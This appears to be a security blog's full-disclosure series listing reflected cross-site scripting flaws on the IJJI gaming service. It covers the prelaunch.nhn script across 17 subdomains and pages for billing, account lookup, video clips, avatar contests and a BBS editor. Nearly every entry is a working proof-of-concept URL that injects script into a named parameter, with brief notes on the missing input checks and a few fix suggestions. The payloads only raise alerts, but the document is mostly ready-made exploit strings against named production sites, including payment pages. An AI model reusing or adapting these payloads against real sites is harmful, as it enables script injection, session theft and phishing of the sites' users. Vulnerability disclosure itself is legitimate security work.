Global Pre-Launch [BONUS2]

Type: Non-persistent
Criteria: None

This post is a continuation of the disclosure of prelaunch.nhn script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more; totalling 17 copies of the same script.

10) Miscellaneous

http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

11) Bulletin Board System

http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

12) Channel

http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

13) Billing

http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

14) HTTPS Billing

https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

15) Facebook

http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

16) Message

http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

17) Avatar

http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:

If the user is authenticated, they will be alerted:

This channel does not exist

If the user is not authenticated, then they will be redirected to login (there is a timed delay on with Firefox).

Global Pre-Launch [BONUS]

Type: Non-persistent
Criteria: None

Thus begins the final 4 days of this experiment; hopefully ending with a bang.

This post will disclose 9 seperate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins to launch one of the many games offered on the IJJI service.

1) Top-level

http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

2) www2

http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

3) Huxley:The Dystopia

http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

4) Soldier Front

http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

5) GunZ

http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

6) Drift City

http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

7) Lunia

http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

8) Game

http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

9) Events

http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

They clearly all exploit the same parameter, as they share the same script. I plan to writeup better descriptions in a seperate post.

Game Screenshot

Type: Non-persistent
Criteria: None

http://game.ijji.com/sshot.nhn?gameId=u_gunz&index=0);alert(/xss/.source

Fairly old method, updated without the need for single or double quotes for the “xss” string (which are now correctly encoded before output). The variable index still doesn’t strip anything which doesn’t resemble an integer.

HTTPS Add G Coin

Type: Non-persistent
Criteria: Requires login

https://billing.ijji.com/payment/paymentprocess.nhn?RURL=%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20alt=%22

Another vulnerability from the paymentprocess.nhn script. The RURL (referral URL) variable doesn’t check if the address supplied is valid or care to strip any characters. A particularly lazy example.

Outputted to a hidden input tag (REQ_RURL), there are no visible changes to the end-user.

Video Clip

Type: Non-persistent
Criteria: None

http://game.ijji.com/movie.nhn?m=big&flvURL=http://.ijji.com/%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E

The variable flvURL must reference the string “.ijji.com/” and start with a valid protocol (eg HTTP) or the content-length will be zero. However, the address doesn’t have to be a valid resource.

Find Account 2

Type: Non-persistent
Criteria: Not logged in

http://member.ijji.com/account/findAccount.nhn?m=findMemberid&email=%22%3E%3Cimg%20src=x%20onerror=%22alert%28%27xss%27%29

No input check on the variable email. Low-risk, but vulnerable all the same.

Due to the recent IJJI redesign, the first Find Account post has been updated (link).

Billing Country

Type: Non-persistent
Criteria: Logged in

http://billing.ijji.com/payment/paymentprocess.nhn?m=preCheck&REQ_METHOD=ONEBIP&country=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%27xss%27%29%20/%3E

As part of the billing process, this page checks the REQ_METHOD parameter in order to point the user to the correct external website to make payment. There is no such check on the parameter country.

I suggest that instead of plaintext, the system makes use of country codes.

Avatar Contest

Type: Non-persistent
Criteria: None

http://avatar.ijji.com/contest/viewPastWin.nhn?contestNo=45&contestantNo=20004&page=%22%3E%3Cimg%20src=x%20onerror=%22alert(%27xss%27)

The variable page is left completely unsanitized. A simple numerical check would prevent this.

HTTPS Billing

Type: Non-persistent
Criteria: Requires login

https://billing.ijji.com/payment/paymentprocess.nhn?gameid=0004&itemid=S97&itemcoin=48&itemimgurl=http://images.ijjimax.com/v2/arcade/gunz/shop/icons/icon_fset_58_150.png%22%20onload=%22alert(%27xss%27)

BBS Editor

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/bbsEditor.nhn?width=570,370%29;alert%28/xss/.source%29;//&themeName=black

Note that the exploit will execute twice under Internet Explorer.

The vulnerability lies entirely within the variable width, which should only accept integer values, and of a restricted size (2-4 digits).

This exploit has been updated